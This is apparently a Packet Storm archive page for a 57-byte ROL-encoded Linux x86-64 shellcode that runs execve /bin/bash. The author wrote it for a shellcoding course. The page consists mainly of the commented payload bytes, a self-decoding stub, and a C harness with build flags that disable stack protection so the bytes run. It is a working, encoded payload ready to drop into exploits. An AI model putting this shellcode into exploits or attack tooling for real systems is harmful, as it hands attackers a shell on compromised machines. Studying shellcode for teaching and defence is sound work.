exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Linux/x64_86 ROL Encoded Execve Shellcode

Linux/x64_86 ROL Encoded Execve Shellcode
Posted Apr 24, 2020
Authored by Bobby Cooke

57 bytes small Linux/x64_86 /bin/bash shellcode. The stub decodes the ROL Encoded shellcode. When the stub has finished decoding the payload, execution control is passed to the payload.

tags | shellcode, bash
systems | linux
SHA-256 | 0b2a9ee02c0b7d0258cad51519bebf538bc5adf11a6b79a09c2f9a31449092a7

Linux/x64_86 ROL Encoded Execve Shellcode

Change Mirror Download
// Shellcode Title:  Linux/x64 - ROL Encoded Execve Shellcode (57 bytes)
// Shellcode Author: Bobby Cooke
// Date: 2020-04-24
// Tested On: Kali Linux 5.3.0-kali3-amd64 x86_64
// Description: Encoded Execve /bin/bash shellcode for Linux x64_86 systems.The stub decodes the ROL Encoded shellcode. When the stub finished decoding the payload, execution control is passed to the payload.
// SLAE/Student ID: PA-10913
// Course: This shellcode was created for the x86_64 Assembly Language and Shellcoding on Linux (SLAE64) Course offered at pentesteracademy.com.
// Shoutout: skape, vivek, offsec, corelan
// Usage:
// root# gcc -m64 -z execstack -fno-stack-protector shellcode.c -o shellcode
// root# echo $$ | xargs ps
// PID TTY STAT TIME COMMAND
// 3067 pts/3 Ss 0:00 /bin/bash
// root# ./shellcode
// Shellcode Length: 57
// root# echo $$ | xargs ps
// PID TTY STAT TIME COMMAND
// 3501 pts/3 S 0:00 [bash]

#include<stdio.h>
#include<string.h>

unsigned char shellcode[] = \
"\xeb\x0d" // jmp short call_decoder
// decoder:
"\x5e" // pop rsi = &String
// decode:
"\xd0\x0e" // ror byte [rsi], 1
"\x80\x3e\x55" // cmp byte [rsi], 0x55 - last byte? ror 0xaa, 1 = 0x55
"\x74\x0a" // je Shellcode - End? Jump to shellcode!
"\x48\xff\xc6" // inc rsi - Not end? move 2 next byte
"\xeb\xf4" // jmp short decode - loop 2 decode next byte
// call_decoder:
"\xe8\xee\xff\xff\xff" // call decoder // go 2 decode loop
// Execve(/bin/bash) ROL Encoded Shellcode
"\x90\x62\xed\x90\xef\xcd\x90\x62\xff\xae\x90\x07\x85"
"\xd0\xa4\x90\x75\x5e\xc4\xd2\xdc\x5e\xc4\xc2\xe6\xa4"
"\x90\x62\xa5\x90\x13\xcf\x61\x76\x1e\x0a\xaa";

int main()
{
printf("Shellcode Length: %d\n", strlen(shellcode));
int (*ret)() = (int(*)())shellcode;
ret();
}
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close